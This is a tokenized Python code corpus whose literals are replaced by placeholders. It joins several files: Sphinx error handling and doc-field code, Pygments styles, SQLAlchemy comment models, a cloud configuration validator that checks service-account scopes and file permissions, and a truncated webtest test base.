app . 
statuscode <EOL> except ( Exception , KeyboardInterrupt ) as err : <EOL> if opts . pdb : <EOL> import pdb <EOL> print ( red ( '<STR_LIT>' ) , <EOL> file = error ) <EOL> traceback . print_exc ( ) <EOL> pdb . post_mortem ( sys . exc_info ( ) [ <NUM_LIT:2> ] ) <EOL> else : <EOL> print ( file = error ) <EOL> if opts . verbosity or opts . traceback : <EOL> traceback . print_exc ( None , error ) <EOL> print ( file = error ) <EOL> if isinstance ( err , KeyboardInterrupt ) : <EOL> print ( '<STR_LIT>' , file = error ) <EOL> elif isinstance ( err , SystemMessage ) : <EOL> print ( red ( '<STR_LIT>' ) , file = error ) <EOL> print ( terminal_safe ( err . args [ <NUM_LIT:0> ] ) , file = error ) <EOL> elif isinstance ( err , SphinxError ) : <EOL> print ( red ( '<STR_LIT>' % err . category ) , file = error ) <EOL> print ( terminal_safe ( text_type ( err ) ) , file = error ) <EOL> elif isinstance ( err , UnicodeError ) : <EOL> print ( red ( '<STR_LIT>' ) , file = error ) <EOL> print ( terminal_safe ( text_type ( err ) ) , file = error ) <EOL> tbpath = save_traceback ( app ) <EOL> print ( red ( '<STR_LIT>' <EOL> '<STR_LIT>' % tbpath ) , <EOL> file = error ) <EOL> elif isinstance ( err , RuntimeError ) and '<STR_LIT>' in str ( err ) : <EOL> print ( red ( '<STR_LIT>' ) , file = error ) <EOL> print ( terminal_safe ( text_type ( err ) ) , file = error ) <EOL> print ( file = error ) <EOL> print ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , file = error ) <EOL> print ( '<STR_LIT>' , file = error ) <EOL> else : <EOL> print ( red ( '<STR_LIT>' ) , file = error ) <EOL> print ( format_exception_cut_frames ( ) . rstrip ( ) , file = error ) <EOL> tbpath = save_traceback ( app ) <EOL> print ( red ( '<STR_LIT>' <EOL> '<STR_LIT>' % tbpath ) , <EOL> file = error ) <EOL> print ( '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> file = error ) <EOL> print ( '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> file = error ) <EOL> return <NUM_LIT:1> </s>
<s> """<STR_LIT>""" <EOL> from pygments . style import Style <EOL> from pygments . styles . friendly import FriendlyStyle <EOL> from pygments . token import Generic , Comment , Number , Whitespace , Keyword , Operator , Name , String , Error <EOL> class NoneStyle ( Style ) : <EOL> """<STR_LIT>""" <EOL> class SphinxStyle ( Style ) : <EOL> """<STR_LIT>""" <EOL> background_color = '<STR_LIT>' <EOL> default_style = '<STR_LIT>' <EOL> styles = FriendlyStyle . styles <EOL> styles . update ( { <EOL> Generic . Output : '<STR_LIT>' , <EOL> Comment : '<STR_LIT>' , <EOL> Number : '<STR_LIT>' , <EOL> } ) <EOL> class PyramidStyle ( Style ) : <EOL> """<STR_LIT>""" <EOL> background_color = "<STR_LIT>" <EOL> default_style = "<STR_LIT>" <EOL> styles = { <EOL> Whitespace : "<STR_LIT>" , <EOL> Comment : "<STR_LIT>" , <EOL> Comment . Preproc : "<STR_LIT>" , <EOL> Comment . Special : "<STR_LIT>" , <EOL> Keyword : "<STR_LIT>" , <EOL> Keyword . Pseudo : "<STR_LIT>" , <EOL> Keyword . Type : "<STR_LIT>" , <EOL> Operator : "<STR_LIT>" , <EOL> Operator . Word : "<STR_LIT>" , <EOL> Name . Builtin : "<STR_LIT>" , <EOL> Name . Function : "<STR_LIT>" , <EOL> Name . Class : "<STR_LIT>" , <EOL> Name . Namespace : "<STR_LIT>" , <EOL> Name . Exception : "<STR_LIT>" , <EOL> Name . Variable : "<STR_LIT>" , <EOL> Name . Constant : "<STR_LIT>" , <EOL> Name . Label : "<STR_LIT>" , <EOL> Name . Entity : "<STR_LIT>" , <EOL> Name . Attribute : "<STR_LIT>" , <EOL> Name . Tag : "<STR_LIT>" , <EOL> Name . Decorator : "<STR_LIT>" , <EOL> String : "<STR_LIT>" , <EOL> String . Doc : "<STR_LIT>" , <EOL> String . Interpol : "<STR_LIT>" , <EOL> String . Escape : "<STR_LIT>" , <EOL> String . Regex : "<STR_LIT>" , <EOL> String . Symbol : "<STR_LIT>" , <EOL> String . Other : "<STR_LIT>" , <EOL> Number : "<STR_LIT>" , <EOL> Generic . Heading : "<STR_LIT>" , <EOL> Generic . Subheading : "<STR_LIT>" , <EOL> Generic . Deleted : "<STR_LIT>" , <EOL> Generic . Inserted : "<STR_LIT>" , <EOL> Generic . 
Error : "<STR_LIT>" , <EOL> Generic . Emph : "<STR_LIT>" , <EOL> Generic . Strong : "<STR_LIT>" , <EOL> Generic . Prompt : "<STR_LIT>" , <EOL> Generic . Output : "<STR_LIT>" , <EOL> Generic . Traceback : "<STR_LIT>" , <EOL> Error : "<STR_LIT>" <EOL> } </s>
<s> """<STR_LIT>""" <EOL> from docutils import nodes <EOL> from sphinx import addnodes <EOL> def _is_single_paragraph ( node ) : <EOL> """<STR_LIT>""" <EOL> if len ( node ) == <NUM_LIT:0> : <EOL> return False <EOL> elif len ( node ) > <NUM_LIT:1> : <EOL> for subnode in node [ <NUM_LIT:1> : ] : <EOL> if not isinstance ( subnode , nodes . system_message ) : <EOL> return False <EOL> if isinstance ( node [ <NUM_LIT:0> ] , nodes . paragraph ) : <EOL> return True <EOL> return False <EOL> class Field ( object ) : <EOL> """<STR_LIT>""" <EOL> is_grouped = False <EOL> is_typed = False <EOL> def __init__ ( self , name , names = ( ) , label = None , has_arg = True , rolename = None , <EOL> bodyrolename = None ) : <EOL> self . name = name <EOL> self . names = names <EOL> self . label = label <EOL> self . has_arg = has_arg <EOL> self . rolename = rolename <EOL> self . bodyrolename = bodyrolename <EOL> def make_xref ( self , rolename , domain , target , <EOL> innernode = addnodes . literal_emphasis , contnode = None ) : <EOL> if not rolename : <EOL> return contnode or innernode ( target , target ) <EOL> refnode = addnodes . pending_xref ( '<STR_LIT>' , refdomain = domain , refexplicit = False , <EOL> reftype = rolename , reftarget = target ) <EOL> refnode += contnode or innernode ( target , target ) <EOL> return refnode <EOL> def make_entry ( self , fieldarg , content ) : <EOL> return ( fieldarg , content ) <EOL> def make_field ( self , types , domain , item ) : <EOL> fieldarg , content = item <EOL> fieldname = nodes . field_name ( '<STR_LIT>' , self . label ) <EOL> if fieldarg : <EOL> fieldname += nodes . Text ( '<STR_LIT:U+0020>' ) <EOL> fieldname += self . make_xref ( self . rolename , domain , <EOL> fieldarg , nodes . Text ) <EOL> if len ( content ) == <NUM_LIT:1> and ( <EOL> isinstance ( content [ <NUM_LIT:0> ] , nodes . Text ) or <EOL> ( isinstance ( content [ <NUM_LIT:0> ] , nodes . 
inline ) and len ( content [ <NUM_LIT:0> ] ) == <NUM_LIT:1> and <EOL> isinstance ( content [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , nodes . Text ) ) ) : <EOL> content = [ self . make_xref ( self . bodyrolename , domain , <EOL> content [ <NUM_LIT:0> ] . astext ( ) , contnode = content [ <NUM_LIT:0> ] ) ] <EOL> fieldbody = nodes . field_body ( '<STR_LIT>' , nodes . paragraph ( '<STR_LIT>' , '<STR_LIT>' , * content ) ) <EOL> return nodes . field ( '<STR_LIT>' , fieldname , fieldbody ) <EOL> class GroupedField ( Field ) : <EOL> """<STR_LIT>""" <EOL> is_grouped = True <EOL> list_type = nodes . bullet_list <EOL> def __init__ ( self , name , names = ( ) , label = None , rolename = None , <EOL> can_collapse = False ) : <EOL> Field . __init__ ( self , name , names , label , True , rolename ) <EOL> self . can_collapse = can_collapse <EOL> def make_field ( self , types , domain , items ) : <EOL> fieldname = nodes . field_name ( '<STR_LIT>' , self . label ) <EOL> listnode = self . list_type ( ) <EOL> for fieldarg , content in items : <EOL> par = nodes . paragraph ( ) <EOL> par += self . make_xref ( self . rolename , domain , fieldarg , <EOL> addnodes . literal_strong ) <EOL> par += nodes . Text ( '<STR_LIT>' ) <EOL> par += content <EOL> listnode += nodes . list_item ( '<STR_LIT>' , par ) <EOL> if len ( items ) == <NUM_LIT:1> and self . can_collapse : <EOL> fieldbody = nodes . field_body ( '<STR_LIT>' , listnode [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] ) <EOL> return nodes . field ( '<STR_LIT>' , fieldname , fieldbody ) <EOL> fieldbody = nodes . field_body ( '<STR_LIT>' , listnode ) <EOL> return nodes . field ( '<STR_LIT>' , fieldname , fieldbody ) <EOL> class TypedField ( GroupedField ) : <EOL> """<STR_LIT>""" <EOL> is_typed = True <EOL> def __init__ ( self , name , names = ( ) , typenames = ( ) , label = None , <EOL> rolename = None , typerolename = None , can_collapse = False ) : <EOL> GroupedField . __init__ ( self , name , names , label , rolename , can_collapse ) <EOL> self . 
typenames = typenames <EOL> self . typerolename = typerolename <EOL> def make_field ( self , types , domain , items ) : <EOL> def handle_item ( fieldarg , content ) : <EOL> par = nodes . paragraph ( ) <EOL> par += self . make_xref ( self . rolename , domain , fieldarg , <EOL> addnodes . literal_strong ) <EOL> if fieldarg in types : <EOL> par += nodes . Text ( '<STR_LIT>' ) <EOL> fieldtype = types . pop ( fieldarg ) <EOL> if len ( fieldtype ) == <NUM_LIT:1> and isinstance ( fieldtype [ <NUM_LIT:0> ] , nodes . Text ) : <EOL> typename = u'<STR_LIT>' . join ( n . astext ( ) for n in fieldtype ) <EOL> par += self . make_xref ( self . typerolename , domain , typename , <EOL> addnodes . literal_emphasis ) <EOL> else : <EOL> par += fieldtype <EOL> par += nodes . Text ( '<STR_LIT:)>' ) <EOL> par += nodes . Text ( '<STR_LIT>' ) <EOL> par += content <EOL> return par <EOL> fieldname = nodes . field_name ( '<STR_LIT>' , self . label ) <EOL> if len ( items ) == <NUM_LIT:1> and self . can_collapse : <EOL> fieldarg , content = items [ <NUM_LIT:0> ] <EOL> bodynode = handle_item ( fieldarg , content ) <EOL> else : <EOL> bodynode = self . list_type ( ) <EOL> for fieldarg , content in items : <EOL> bodynode += nodes . list_item ( '<STR_LIT>' , handle_item ( fieldarg , content ) ) <EOL> fieldbody = nodes . field_body ( '<STR_LIT>' , bodynode ) <EOL> return nodes . field ( '<STR_LIT>' , fieldname , fieldbody ) <EOL> class DocFieldTransformer ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , directive ) : <EOL> self . domain = directive . domain <EOL> if '<STR_LIT>' not in directive . __class__ . __dict__ : <EOL> directive . __class__ . _doc_field_type_map = self . preprocess_fieldtypes ( directive . __class__ . doc_field_types ) <EOL> self . typemap = directive . _doc_field_type_map <EOL> def preprocess_fieldtypes ( self , types ) : <EOL> typemap = { } <EOL> for fieldtype in types : <EOL> for name in fieldtype . 
names : <EOL> typemap [ name ] = fieldtype , False <EOL> if fieldtype . is_typed : <EOL> for name in fieldtype . typenames : <EOL> typemap [ name ] = fieldtype , True <EOL> return typemap <EOL> def transform_all ( self , node ) : <EOL> """<STR_LIT>""" <EOL> for child in node : <EOL> if isinstance ( child , nodes . field_list ) : <EOL> self . transform ( child ) <EOL> def transform ( self , node ) : <EOL> """<STR_LIT>""" <EOL> typemap = self . typemap <EOL> entries = [ ] <EOL> groupindices = { } <EOL> types = { } <EOL> for field in node : <EOL> fieldname , fieldbody = field <EOL> try : <EOL> fieldtype , fieldarg = fieldname . astext ( ) . split ( None , <NUM_LIT:1> ) <EOL> except ValueError : <EOL> fieldtype , fieldarg = fieldname . astext ( ) , '<STR_LIT>' <EOL> typedesc , is_typefield = typemap . get ( fieldtype , ( None , None ) ) <EOL> if typedesc is None or typedesc . has_arg != bool ( fieldarg ) : <EOL> new_fieldname = fieldtype [ <NUM_LIT:0> : <NUM_LIT:1> ] . upper ( ) + fieldtype [ <NUM_LIT:1> : ] <EOL> if fieldarg : <EOL> new_fieldname += '<STR_LIT:U+0020>' + fieldarg <EOL> fieldname [ <NUM_LIT:0> ] = nodes . Text ( new_fieldname ) <EOL> entries . append ( field ) <EOL> continue <EOL> typename = typedesc . name <EOL> if _is_single_paragraph ( fieldbody ) : <EOL> content = fieldbody . children [ <NUM_LIT:0> ] . children <EOL> else : <EOL> content = fieldbody . children <EOL> if is_typefield : <EOL> content = [ n for n in content if isinstance ( n , nodes . Inline ) or <EOL> isinstance ( n , nodes . Text ) ] <EOL> if content : <EOL> types . setdefault ( typename , { } ) [ fieldarg ] = content <EOL> continue <EOL> if typedesc . is_typed : <EOL> try : <EOL> argtype , argname = fieldarg . split ( None , <NUM_LIT:1> ) <EOL> except ValueError : <EOL> pass <EOL> else : <EOL> types . setdefault ( typename , { } ) [ argname ] = [ nodes . Text ( argtype ) ] <EOL> fieldarg = argname <EOL> translatable_content = nodes . inline ( fieldbody . 
rawsource , <EOL> translatable = True ) <EOL> translatable_content . source = fieldbody . parent . source <EOL> translatable_content . line = fieldbody . parent . line <EOL> translatable_content += content <EOL> if typedesc . is_grouped : <EOL> if typename in groupindices : <EOL> group = entries [ groupindices [ typename ] ] <EOL> else : <EOL> groupindices [ typename ] = len ( entries ) <EOL> group = [ typedesc , [ ] ] <EOL> entries . append ( group ) <EOL> entry = typedesc . make_entry ( fieldarg , [ translatable_content ] ) <EOL> group [ <NUM_LIT:1> ] . append ( entry ) <EOL> else : <EOL> entry = typedesc . make_entry ( fieldarg , [ translatable_content ] ) <EOL> entries . append ( [ typedesc , entry ] ) <EOL> new_list = nodes . field_list ( ) <EOL> for entry in entries : <EOL> if isinstance ( entry , nodes . field ) : <EOL> new_list += entry <EOL> else : <EOL> fieldtype , content = entry <EOL> fieldtypes = types . get ( fieldtype . name , { } ) <EOL> new_list += fieldtype . make_field ( fieldtypes , self . domain , <EOL> content ) <EOL> node . replace_self ( new_list ) </s>
<s> """<STR_LIT>""" <EOL> from datetime import datetime <EOL> from sqlalchemy import Column , Integer , Text , String , Boolean , ForeignKey , DateTime <EOL> from sqlalchemy . orm import relation , sessionmaker , aliased <EOL> from sqlalchemy . ext . declarative import declarative_base <EOL> Base = declarative_base ( ) <EOL> Session = sessionmaker ( ) <EOL> db_prefix = '<STR_LIT>' <EOL> class Node ( Base ) : <EOL> """<STR_LIT>""" <EOL> __tablename__ = db_prefix + '<STR_LIT>' <EOL> id = Column ( String ( <NUM_LIT:32> ) , primary_key = True ) <EOL> document = Column ( String ( <NUM_LIT> ) , nullable = False ) <EOL> source = Column ( Text , nullable = False ) <EOL> def nested_comments ( self , username , moderator ) : <EOL> """<STR_LIT>""" <EOL> session = Session ( ) <EOL> if username : <EOL> sq = session . query ( CommentVote ) . filter ( CommentVote . username == username ) . subquery ( ) <EOL> cvalias = aliased ( CommentVote , sq ) <EOL> q = session . query ( Comment , cvalias . value ) . outerjoin ( cvalias ) <EOL> else : <EOL> q = session . query ( Comment ) <EOL> q = q . filter ( Comment . path . like ( str ( self . id ) + '<STR_LIT>' ) ) <EOL> if not moderator : <EOL> q = q . filter ( Comment . displayed == True ) <EOL> results = q . order_by ( Comment . path ) . all ( ) <EOL> session . close ( ) <EOL> return self . _nest_comments ( results , username ) <EOL> def _nest_comments ( self , results , username ) : <EOL> """<STR_LIT>""" <EOL> comments = [ ] <EOL> list_stack = [ comments ] <EOL> for r in results : <EOL> if username : <EOL> comment , vote = r <EOL> else : <EOL> comment , vote = ( r , <NUM_LIT:0> ) <EOL> inheritance_chain = comment . path . split ( '<STR_LIT:.>' ) [ <NUM_LIT:1> : ] <EOL> if len ( inheritance_chain ) == len ( list_stack ) + <NUM_LIT:1> : <EOL> parent = list_stack [ - <NUM_LIT:1> ] [ - <NUM_LIT:1> ] <EOL> list_stack . 
append ( parent [ '<STR_LIT>' ] ) <EOL> elif len ( inheritance_chain ) < len ( list_stack ) : <EOL> while len ( inheritance_chain ) < len ( list_stack ) : <EOL> list_stack . pop ( ) <EOL> list_stack [ - <NUM_LIT:1> ] . append ( comment . serializable ( vote = vote ) ) <EOL> return comments <EOL> def __init__ ( self , id , document , source ) : <EOL> self . id = id <EOL> self . document = document <EOL> self . source = source <EOL> class CommentVote ( Base ) : <EOL> """<STR_LIT>""" <EOL> __tablename__ = db_prefix + '<STR_LIT>' <EOL> username = Column ( String ( <NUM_LIT:64> ) , primary_key = True ) <EOL> comment_id = Column ( Integer , ForeignKey ( db_prefix + '<STR_LIT>' ) , <EOL> primary_key = True ) <EOL> value = Column ( Integer , nullable = False ) <EOL> def __init__ ( self , comment_id , username , value ) : <EOL> self . comment_id = comment_id <EOL> self . username = username <EOL> self . value = value <EOL> class Comment ( Base ) : <EOL> """<STR_LIT>""" <EOL> __tablename__ = db_prefix + '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> rating = Column ( Integer , nullable = False ) <EOL> time = Column ( DateTime , nullable = False ) <EOL> text = Column ( Text , nullable = False ) <EOL> displayed = Column ( Boolean , index = True , default = False ) <EOL> username = Column ( String ( <NUM_LIT:64> ) ) <EOL> proposal = Column ( Text ) <EOL> proposal_diff = Column ( Text ) <EOL> path = Column ( String ( <NUM_LIT> ) , index = True ) <EOL> node_id = Column ( String ( <NUM_LIT:32> ) , ForeignKey ( db_prefix + '<STR_LIT>' ) ) <EOL> node = relation ( Node , backref = "<STR_LIT>" ) <EOL> votes = relation ( CommentVote , backref = "<STR_LIT>" , <EOL> cascade = "<STR_LIT:all>" ) <EOL> def __init__ ( self , text , displayed , username , rating , time , <EOL> proposal , proposal_diff ) : <EOL> self . text = text <EOL> self . displayed = displayed <EOL> self . username = username <EOL> self . rating = rating <EOL> self . time = time <EOL> self . 
proposal = proposal <EOL> self . proposal_diff = proposal_diff <EOL> def set_path ( self , node_id , parent_id ) : <EOL> """<STR_LIT>""" <EOL> if node_id : <EOL> self . node_id = node_id <EOL> self . path = '<STR_LIT>' % ( node_id , self . id ) <EOL> else : <EOL> session = Session ( ) <EOL> parent_path = session . query ( Comment . path ) . filter ( Comment . id == parent_id ) . one ( ) . path <EOL> session . close ( ) <EOL> self . node_id = parent_path . split ( '<STR_LIT:.>' ) [ <NUM_LIT:0> ] <EOL> self . path = '<STR_LIT>' % ( parent_path , self . id ) <EOL> def serializable ( self , vote = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> delta = datetime . now ( ) - self . time <EOL> time = { '<STR_LIT>' : self . time . year , <EOL> '<STR_LIT>' : self . time . month , <EOL> '<STR_LIT>' : self . time . day , <EOL> '<STR_LIT>' : self . time . hour , <EOL> '<STR_LIT>' : self . time . minute , <EOL> '<STR_LIT>' : self . time . second , <EOL> '<STR_LIT>' : self . time . isoformat ( ) , <EOL> '<STR_LIT>' : self . pretty_delta ( delta ) } <EOL> path = self . path . split ( '<STR_LIT:.>' ) <EOL> node = path [ <NUM_LIT:0> ] <EOL> if len ( path ) > <NUM_LIT:2> : <EOL> parent = path [ - <NUM_LIT:2> ] <EOL> else : <EOL> parent = None <EOL> return { '<STR_LIT:text>' : self . text , <EOL> '<STR_LIT:username>' : self . username or '<STR_LIT>' , <EOL> '<STR_LIT:id>' : self . id , <EOL> '<STR_LIT>' : node , <EOL> '<STR_LIT>' : parent , <EOL> '<STR_LIT>' : self . rating , <EOL> '<STR_LIT>' : self . displayed , <EOL> '<STR_LIT>' : delta . seconds , <EOL> '<STR_LIT:time>' : time , <EOL> '<STR_LIT>' : vote or <NUM_LIT:0> , <EOL> '<STR_LIT>' : self . proposal_diff , <EOL> '<STR_LIT>' : [ ] } <EOL> def pretty_delta ( self , delta ) : <EOL> """<STR_LIT>""" <EOL> days = delta . days <EOL> seconds = delta . 
seconds <EOL> hours = seconds / <NUM_LIT> <EOL> minutes = seconds / <NUM_LIT> <EOL> if days == <NUM_LIT:0> : <EOL> if hours == <NUM_LIT:0> : <EOL> dt = ( minutes , '<STR_LIT>' ) <EOL> else : <EOL> dt = ( hours , '<STR_LIT>' ) <EOL> else : <EOL> dt = ( days , '<STR_LIT>' ) <EOL> if dt [ <NUM_LIT:0> ] == <NUM_LIT:1> : <EOL> ret = '<STR_LIT>' % dt <EOL> else : <EOL> ret = '<STR_LIT>' % dt <EOL> return ret </s>
<s> import os <EOL> import sys <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . dirname ( os . path . abspath ( '<STR_LIT:.>' ) ) ) <EOL> project = '<STR_LIT:test>' <EOL> master_doc = '<STR_LIT:index>' </s>
<s> master_doc = '<STR_LIT:index>' <EOL> exclude_patterns = [ '<STR_LIT>' ] <EOL> rst_epilog = '''<STR_LIT>''' </s>
<s> import os <EOL> import re <EOL> import sys <EOL> from configurator import Configurator <EOL> from fetch import fetch <EOL> from fetch import is_google_instance <EOL> from fetch import GOOGLE_INSTANCE_METADATA_URL <EOL> from fetch import GOOGLE_METADATA_URL <EOL> from fetch import GOOGLE_OAUTH_URL <EOL> def _host_regex_token ( ) : <EOL> ip6_group = '<STR_LIT>' <EOL> ip6_full_host_token = '<STR_LIT>' . format ( group = ip6_group ) <EOL> ip6_abbrev_host_token = '<STR_LIT>' . format ( group = ip6_group ) <EOL> ip6_host_token = '<STR_LIT>' . format ( <EOL> full = ip6_full_host_token , abbrev = ip6_abbrev_host_token ) <EOL> ip4_host_token = '<STR_LIT>' <EOL> name_host_token = '<STR_LIT>' <EOL> host_token = '<STR_LIT>' . format ( <EOL> ip4 = ip4_host_token , ip6 = ip6_host_token , name = name_host_token ) <EOL> return host_token <EOL> class ValidateConfig ( object ) : <EOL> @ property <EOL> def errors ( self ) : <EOL> return self . __errors <EOL> @ property <EOL> def warnings ( self ) : <EOL> return self . __warnings <EOL> def __init__ ( self , configurator = None ) : <EOL> if not configurator : <EOL> configurator = Configurator ( ) <EOL> self . __bindings = configurator . bindings <EOL> self . __user_config_dir = configurator . user_config_dir <EOL> self . __installation_config_dir = configurator . installation_config_dir <EOL> self . __warnings = [ ] <EOL> self . __errors = [ ] <EOL> def validate ( self ) : <EOL> """<STR_LIT>""" <EOL> self . verify_at_least_one_provider_enabled ( ) <EOL> self . verify_google_scopes ( ) <EOL> self . verify_external_dependencies ( ) <EOL> self . verify_security ( ) <EOL> found_local = False <EOL> for ymldir in [ self . __user_config_dir , self . __installation_config_dir ] : <EOL> yml_path = os . path . join ( ymldir , '<STR_LIT>' ) <EOL> if not os . path . exists ( yml_path ) : <EOL> continue <EOL> found_local = True <EOL> if not found_local : <EOL> self . __warnings . append ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . 
format ( <EOL> user = self . __user_config_dir , <EOL> install = self . __installation_config_dir ) ) <EOL> if self . __warnings : <EOL> print ( '<STR_LIT>' <EOL> . format ( path = yml_path , warnings = '<STR_LIT>' . join ( self . __warnings ) ) ) <EOL> if not self . __errors : <EOL> print '<STR_LIT>' . format ( path = yml_path ) <EOL> return True <EOL> else : <EOL> print ( '<STR_LIT>' <EOL> . format ( path = yml_path , errors = '<STR_LIT>' . join ( self . __errors ) ) ) <EOL> return False <EOL> def check_validate ( self ) : <EOL> """<STR_LIT>""" <EOL> ok = self . validate ( ) <EOL> if not ok : <EOL> msg = '<STR_LIT>' . format ( <EOL> errors = '<STR_LIT>' . join ( self . __errors ) ) <EOL> raise ValueError ( msg ) <EOL> def is_reference ( self , value ) : <EOL> """<STR_LIT>""" <EOL> return isinstance ( value , basestring ) and value . startswith ( '<STR_LIT>' ) <EOL> def verify_true_false ( self , name ) : <EOL> """<STR_LIT>""" <EOL> value = self . __bindings . get ( name ) <EOL> if self . is_reference ( value ) : <EOL> self . __errors . append ( '<STR_LIT>' . format ( name = name ) ) <EOL> return False <EOL> if isinstance ( value , bool ) : <EOL> return True <EOL> self . __errors . append ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . format ( name = name , value = value ) ) <EOL> return False <EOL> def verify_baseUrl ( self , name , required , scheme_optional = False ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> value = self . __bindings . get ( name ) <EOL> except KeyError : <EOL> if not required : <EOL> return True <EOL> self . __errors . append ( '<STR_LIT>' . format ( name = name ) ) <EOL> return False <EOL> if self . is_reference ( value ) : <EOL> if not required : <EOL> return True <EOL> self . __errors . append ( '<STR_LIT>' . format ( name = name ) ) <EOL> return False <EOL> scheme_token = '<STR_LIT>' <EOL> host_token = _host_regex_token ( ) <EOL> port_token = '<STR_LIT>' <EOL> path_token = '<STR_LIT>' <EOL> url_re = re . 
compile ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT:$>' <EOL> . format ( <EOL> scheme = scheme_token , <EOL> scheme_optional = '<STR_LIT:?>' if scheme_optional else '<STR_LIT>' , <EOL> host = host_token , <EOL> port = port_token , <EOL> path = path_token <EOL> ) ) <EOL> match = url_re . match ( value ) <EOL> return match != None <EOL> def verify_host ( self , name , required ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> value = self . __bindings . get ( name ) <EOL> except KeyError : <EOL> if not required : <EOL> return True <EOL> self . __errors . append ( '<STR_LIT>' . format ( name = name ) ) <EOL> return False <EOL> if self . is_reference ( value ) : <EOL> if not required : <EOL> return True <EOL> self . __errors . append ( '<STR_LIT>' . format ( name = name ) ) <EOL> return False <EOL> host_token = _host_regex_token ( ) <EOL> host_regex = '<STR_LIT>' . format ( host = host_token ) <EOL> if not value : <EOL> if not required : <EOL> return True <EOL> else : <EOL> self . __errors . append ( <EOL> '<STR_LIT>' . format ( name = name ) ) <EOL> return False <EOL> if re . match ( host_regex , value ) : <EOL> return True <EOL> self . __errors . append ( <EOL> '<STR_LIT>' . format ( <EOL> value = value , regex = host_regex ) ) <EOL> return False <EOL> def verify_at_least_one_provider_enabled ( self ) : <EOL> providers = self . __bindings . get ( '<STR_LIT>' ) <EOL> for name , attrs in providers . items ( ) : <EOL> if attrs . get ( '<STR_LIT>' , False ) : <EOL> return True <EOL> self . __errors . append ( '<STR_LIT>' ) <EOL> return False <EOL> def verify_google_scopes ( self ) : <EOL> """<STR_LIT>""" <EOL> if not is_google_instance ( ) : <EOL> return <EOL> if not self . verify_true_false ( '<STR_LIT>' ) : <EOL> return <EOL> if not self . __bindings . get ( '<STR_LIT>' ) : <EOL> return <EOL> result = fetch ( <EOL> GOOGLE_INSTANCE_METADATA_URL + '<STR_LIT>' , google = True ) <EOL> service_accounts = result . content if result . 
ok ( ) else '<STR_LIT>' <EOL> required_scopes = [ GOOGLE_OAUTH_URL + '<STR_LIT>' ] <EOL> found_scopes = [ ] <EOL> for account in filter ( bool , service_accounts . split ( '<STR_LIT:\n>' ) ) : <EOL> if account [ - <NUM_LIT:1> ] == '<STR_LIT:/>' : <EOL> account = account [ <NUM_LIT:0> : - <NUM_LIT:1> ] <EOL> result = fetch ( <EOL> os . path . join ( GOOGLE_INSTANCE_METADATA_URL , '<STR_LIT>' , <EOL> os . path . basename ( account ) , '<STR_LIT>' ) , <EOL> google = True ) <EOL> have = str ( result . content ) <EOL> if have . find ( '<STR_LIT>' ) >= <NUM_LIT:0> : <EOL> found_scopes . extend ( required_scopes ) <EOL> for scope in required_scopes : <EOL> if have . find ( scope ) >= <NUM_LIT:0> : <EOL> found_scopes . append ( scope ) <EOL> for scope in required_scopes : <EOL> if not scope in found_scopes : <EOL> self . __errors . append ( <EOL> '<STR_LIT>' . format ( scope = scope ) ) <EOL> def verify_external_dependencies ( self ) : <EOL> """<STR_LIT>""" <EOL> ok = self . verify_host ( '<STR_LIT>' , required = False ) <EOL> ok = self . verify_host ( '<STR_LIT>' , required = False ) and ok <EOL> return ok <EOL> def verify_user_access_only ( self , path ) : <EOL> """<STR_LIT>""" <EOL> if not path or not os . path . exists ( path ) : <EOL> return True <EOL> stat = os . stat ( path ) <EOL> if stat . st_mode & <NUM_LIT:0> <NUM_LIT> : <EOL> self . __errors . append ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . format ( path = path , <EOL> mode = '<STR_LIT>' % ( stat . st_mode & <NUM_LIT> ) ) ) <EOL> return False <EOL> return True <EOL> def verify_security ( self ) : <EOL> """<STR_LIT>""" <EOL> ok = True <EOL> for path in [ <EOL> self . __bindings . get ( '<STR_LIT>' ) , <EOL> os . path . join ( self . __user_config_dir , '<STR_LIT>' ) , <EOL> os . path . join ( self . __installation_config_dir , '<STR_LIT>' ) , <EOL> os . path . join ( os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) , '<STR_LIT>' ) ] : <EOL> ok = self . 
verify_user_access_only ( path ) and ok <EOL> return ok <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> sys . exit ( <NUM_LIT:0> if ValidateConfig ( ) . validate ( ) else - <NUM_LIT:1> ) </s>
<s> import collections <EOL> try : <EOL> import unittest2 as unittest <EOL> except ImportError : <EOL> import unittest <EOL> import base64 <EOL> import six <EOL> import webtest <EOL> from daybed import __version__ <EOL> from daybed . tokens import get_hawk_credentials <EOL> class PrefixedRequestClass ( webtest . app . TestRequest ) : <EOL> @ classmethod <EOL> def blank ( cls , path , * args , ** kwargs ) : <EOL> path = '<STR_LIT>' % ( __version__ . split ( '<STR_LIT:.>' ) [ <NUM_LIT:0> ] , path ) <EOL> return webtest . app . TestRequest . blank ( path , * args , ** kwargs ) <EOL> class BaseWebTest ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . app = webtest . TestApp ( "<STR_LIT>" , relative_to = '<STR_LIT:.>' ) <EOL> self . app . RequestClass = PrefixedRequestClass <EOL> self . db = self . app . app . registry . backend <EOL> self . indexer = self . app . app . registry . index <EOL> token , self . credentials = get_hawk_credentials ( ) <EOL> self . db . store_credentials ( token , self . credentials ) <EOL> auth_password = base64 . b64encode ( <EOL> ( u'<STR_LIT>' % ( self . credentials [ '<STR_LIT:id>' ] , <EOL> self . credentials [ '<STR_LIT:key>' ] ) ) . encode ( '<STR_LIT:ascii>' ) ) . strip ( ) . decode ( '<STR_LIT:ascii>' ) <EOL> self . headers = { <EOL> '<STR_LIT:Content-Type>' : '<STR_LIT:application/json>' , <EOL> '<STR_LIT>' : 